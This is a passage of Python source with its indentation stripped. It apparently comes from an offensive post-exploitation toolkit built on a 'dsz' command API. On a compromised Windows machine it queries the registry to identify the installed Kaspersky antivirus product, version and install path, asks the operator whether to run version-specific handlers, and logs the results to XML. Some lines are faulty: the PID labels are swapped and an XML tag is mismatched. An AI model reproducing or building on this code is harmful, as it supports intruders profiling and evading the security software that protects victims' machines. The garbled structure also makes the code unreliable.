shared.safePrint('| LOOKS LIKE KASPERSKY v6')
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\AVP6\\settings\\ -value Ins_ProductVersion'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasVersion = tempVal[0]
shared.safePrint(('| VERSION: %s' % kasVersion))
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\AVP6\\settings\\ -value Ins_ProductType'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasType = tempVal[0]
shared.safePrint(('| TYPE: %s' % kasType))
if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*80.*', regName[i])):
numInstalls += 1
shared.safePrint('| LOOKS LIKE KASPERSKY v6 MP4')
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\AVP80\\settings -value Ins_ProductVersion'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasVersion = tempVal[0]
shared.safePrint(('| VERSION: %s' % kasVersion))
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\AVP80\\settings -value Ins_ProductType'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasType = tempVal[0]
shared.safePrint(('| TYPE: %s' % kasType))
if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*9.*', regName[i])):
numInstalls += 1
shared.safePrint('| LOOKS LIKE KASPERSKY v9 (AKA KASPERSKY 2010)')
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp9\\environment -value ProductVersion'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasVersion = tempVal[0]
shared.safePrint(('| VERSION: %s' % kasVersion))
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp9\\environment -value ProductType'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasType = tempVal[0]
shared.safePrint(('| TYPE: %s' % kasType))
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp9\\environment -value productroot'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasRoot = tempVal[0]
if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*11.*', regName[i])):
numInstalls += 1
shared.safePrint('| LOOKS LIKE KASPERSKY v11 (AKA KASPERSKY 2011)')
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp11\\environment -value Ins_ProductVersion'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasVersion = tempVal[0]
shared.safePrint(('| VERSION: %s' % kasVersion))
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp11\\environment -value Ins_ProductType'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasType = tempVal[0]
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp11\\environment -value productroot'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasRoot = tempVal[0]
shared.safePrint(('| ROOT DIR: %s' % kasRoot))
if (numInstalls > 1):
shared.errorBail('THERE ARE MULTIPLE KASPERSKY PSPS ON THE BOX!!!')
return True
dsz.control.echo.On()
else:
kasName = kasAppQuery[0][0]
kasDescription = kasAppQuery[0][1]
kasVersion = kasAppQuery[0][2]
kasType = kasProcQuery[0][0]
kasRoot = kasProcQuery[0][3]
if (re.match('.*WORKSTATION.*', kasName.upper()) or ('WKS' == kasType.upper())):
shared.safePrint('| IT APPEARS TO BE FOR WORKSTATIONS....')
isWorkstation = True
if (re.match('.*SECURITY.*', kasName.upper()) or ('KIS' == kasType.upper())):
shared.safePrint('| IT APPEARS TO BE INTERNET SECURITY....')
isInternetSec = True
for i in range(len(kasProcQuery)):
if re.match('.*SYSTEM.*', kasProcQuery[i][1]):
sysPid = kasProcQuery[i][2]
if re.match('.*user.*', kasProcQuery[i][1]):
usrPid = kasProcQuery[i][2]
shared.safePrint(('| PRODUCT NAME: %s' % kasName))
shared.safePrint(('| VERSION: %s' % kasVersion))
shared.safePrint(('| SYSTEM PID: %d' % usrPid))
shared.safePrint(('| USER PID: %d' % sysPid))
shared.safePrint('+---------------------------------------------------------------------------------')
if (kasVersion != ''):
kasVerSplit = kasVersion.split('.')
if (('6' == kasVerSplit[0]) and isWorkstation):
if ('4' == kasVerSplit[2]):
if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 6 FOR WINDOWS WORKSTATIONS MP4?', True):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| CALLING FUNCTION TO HANDLE VERSION 6 MP4 FOR WINDOWS WORKSTATIONS....')
ver_six.kasVerSixMp4(kasName, kasDescription, kasVersion, kasRoot)
else:
return False
elif dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 6 FOR WINDOWS WORKSTATIONS (NOT MP4)?', True):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| CALLING FUNCTION TO HANDLE VERSION 6 FOR WINDOWS WORKSTATIONS (NOT MP4)....')
ver_six.kasVerSix(kasName, kasDescription, kasVersion, kasRoot)
else:
return False
elif (('9' == kasVerSplit[0]) and isInternetSec):
if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 9 (AKA 2010)?', True):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| CALLING FUNCTION TO HANDLE VERSION 9 (AKA 2010)....')
ver_nine.kasVerNine(kasName, kasDescription, kasVersion, kasRoot)
else:
return False
elif (('11' == kasVerSplit[0]) and isInternetSec):
if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 11 (AKA 2011)?', True):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| CALLING FUNCTION TO HANDLE VERSION 11 (AKA 2011)....')
ver_eleven.kasVerEleven(kasName, kasDescription, kasVersion, kasRoot)
else:
return False
else:
shared.safePrint('| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
shared.safePrint('| THIS VERSION APPEARS TO BE UNSUPPORTED. PLEASE HARASS THOSE RESPONSIBLE.')
shared.safePrint('| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
shared.safePrint('+---------------------------------------------------------------------------------')
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
try:
kasXmlFilePtr.write('<kaspersky_settings>\n')
kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
kasXmlFilePtr.write((('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) + '</vendor>\n'))
kasXmlFilePtr.write((('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
kasXmlFilePtr.write('</kaspersky_settings>\n')
finally:
kasXmlFilePtr.close()
else:
shared.safePrint(('ERRORED PARISNG %s FOR VERSION!' % kasVersion))
return True
